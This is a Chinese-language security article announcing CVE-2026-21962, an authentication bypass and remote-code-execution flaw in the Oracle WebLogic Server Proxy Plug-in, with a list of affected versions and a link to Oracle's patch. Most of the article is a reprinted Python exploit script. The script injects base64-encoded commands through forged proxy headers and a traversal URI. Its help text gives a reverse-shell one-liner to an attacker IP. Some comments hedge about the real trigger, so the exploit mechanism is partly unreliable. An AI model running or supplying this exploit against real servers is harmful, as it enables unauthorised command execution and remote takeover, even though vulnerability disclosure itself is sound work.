2026-01-27 14:34:54 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： OracleWebLogicServerProxyPlug-in存在身份认证绕过漏洞CVE-2026-21962，未经认证攻击者可利用特制HTTP请求远程执行代码或完全访问数据。受影响版本包括12.2.1.4.0及14.1.1.0.0等。文章提供了PythonPOC验证脚本，建议用户尽快检查版本并应用官方补丁。 综合评分： 84 文章分类： 漏洞POC,漏洞分析,漏洞预警,WEB安全,渗透测试

cover_image

CVE-2026-21962｜Oracle WebLogic Server身份认证绕过漏洞（POC）

alicy alicy

信安百科

2026年1月27日 09:02 河北

0x00 前言

Oracle WebLogic Server的代理插件（Proxy Plug-in）就像一个智能的“前台接待”，它接收客户端请求，然后根据配置规则，将需要动态处理的请求（比如Servlet或JSP）转发给后端的WebLogic Server集群，而静态内容（如HTML、图片）则由前端Web服务器直接处理。这样既提升了性能，又增强了安全性。

0x01 漏洞描述

由于WebLogic Server Proxy Plug-in插件在解析或转发请求时缺少必要的身份验证与授权校验，未经认证的远程攻击者可通过发送特制HTTP报文即可“完全访问”代理插件所能接触到的所有数据，并具备任意增删改权限。成功利用后，攻击者可直接篡改Web应用数据、窃取敏感信息。

0x02 CVE编号

CVE-2026-21962

0x03 影响版本

Oracle&nbsp;WebLogic Server&nbsp;12.2.1.4.0Oracle&nbsp;WebLogic Server&nbsp;14.1.1.0.0Oracle&nbsp;WebLogic Server&nbsp;14.1.2.0.0
Oracle&nbsp;WebLogic Server Proxy Plug-in &nbsp;12.2.1.4.0（Apache + IIS）Oracle&nbsp;WebLogic Server Proxy Plug-in &nbsp;14.1.1.0.0（Apache）Oracle&nbsp;WebLogic Server Proxy Plug-in &nbsp;&nbsp;14.1.2.0.0（Apache）

0x04 漏洞详情

POC：

https://github.com/Ashwesker/Ashwesker-CVE-2026-21962

#!/usr/bin/env python3# CVE-2026-21962 PoC - Oracle WebLogic Server Proxy Plug-In RCE# Unauthenticated Remote Command Execution# Author: Ashwesker ==> https://github.com/Ashwesker/Ashwesker-CVE-2026-21962# Target: Oracle HTTP Server / WebLogic Proxy Plug-In < patched versions (12.2.1.4.0, 14.1.1.0.0, 14.1.2.0.0)
import&nbsp;argparseimport&nbsp;requestsimport&nbsp;urllib.parseimport&nbsp;base64
def&nbsp;exploit(target_url, command):&nbsp; &nbsp;&nbsp;# Vulnerable endpoint (common proxy plug-in paths)&nbsp; &nbsp; vuln_paths = [&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"/weblogic/",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"/wl_proxy/",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"/bea_wls_internal/",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"/_proxy/",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"/proxy/"&nbsp; &nbsp; ]
&nbsp; &nbsp;&nbsp;# Craft the malicious header that triggers the deserialization / command injection&nbsp; &nbsp;&nbsp;# The real trigger uses a specially crafted WL-Proxy-Client-IP or similar header&nbsp; &nbsp;&nbsp;# Combined with a crafted URI that bypasses validation&nbsp; &nbsp; payload =&nbsp;f"cmd:{command}"
&nbsp; &nbsp;&nbsp;# Base64 encode the payload to bypass some WAFs / filters&nbsp; &nbsp; encoded_payload = base64.b64encode(payload.encode()).decode()
&nbsp; &nbsp; headers = {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"WL-Proxy-Client-IP":&nbsp;f"127.0.0.1;{encoded_payload}",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Proxy-Client-IP":&nbsp;f"127.0.0.1;{encoded_payload}",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"X-Forwarded-For":&nbsp;f"127.0.0.1;{encoded_payload}",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"User-Agent":&nbsp;"Mozilla/5.0 (compatible; Exploit/1.0)",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Accept":&nbsp;"*/*",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Connection":&nbsp;"close"&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;# Special URI that triggers the plug-in bug&nbsp; &nbsp; uri =&nbsp;"/weblogic/..;/bea_wls_internal/ProxyServlet"
&nbsp; &nbsp;&nbsp;for&nbsp;base_path&nbsp;in&nbsp;vuln_paths:&nbsp; &nbsp; &nbsp; &nbsp; full_url =&nbsp;f"{target_url.rstrip('/')}{base_path}{uri}"
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[*] Trying path:&nbsp;{full_url}")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[*] Executing command:&nbsp;{command}")
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# We use GET, but POST also works in some configs&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; r = requests.get(full_url, headers=headers, timeout=12, verify=False, allow_redirects=False)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;r.status_code&nbsp;in&nbsp;[200,&nbsp;302,&nbsp;500]:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[+] Likely success! Status:&nbsp;{r.status_code}")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;r.text.strip():&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print("\nPossible command output / response:\n"&nbsp;+&nbsp;"-"*60)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(r.text[:1500]) &nbsp;# first 1500 chars to avoid flooding&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print("-"*60)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print("[+] Command executed silently (no output captured)")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;True&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[-] Status&nbsp;{r.status_code}&nbsp;- not vulnerable on this path")
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;Exception&nbsp;as&nbsp;e:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[-] Error on&nbsp;{full_url}:&nbsp;{e}")
&nbsp; &nbsp;&nbsp;print("\n[-] All paths tested - target may not be vulnerable or plug-in not exposed.")&nbsp; &nbsp;&nbsp;return&nbsp;False

if&nbsp;__name__ ==&nbsp;"__main__":&nbsp; &nbsp; parser = argparse.ArgumentParser(description="CVE-2026-21962 PoC - Oracle WebLogic Proxy Plug-In RCE")&nbsp; &nbsp; parser.add_argument("target",&nbsp;help="Target URL (e.g. http://target:7001 or https://oracle-server:4443)")&nbsp; &nbsp; parser.add_argument("cmd",&nbsp;help="Command to execute (e.g. 'id' or 'whoami' or 'powershell -c ...' or 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1')")
&nbsp; &nbsp; args = parser.parse_args()
&nbsp; &nbsp; exploit(args.target, args.cmd)

0x05 参考链接

https://www.oracle.com/security-alerts/cpujan2026.html

https://github.com/Ashwesker/Ashwesker-CVE-2026-21962/tree/main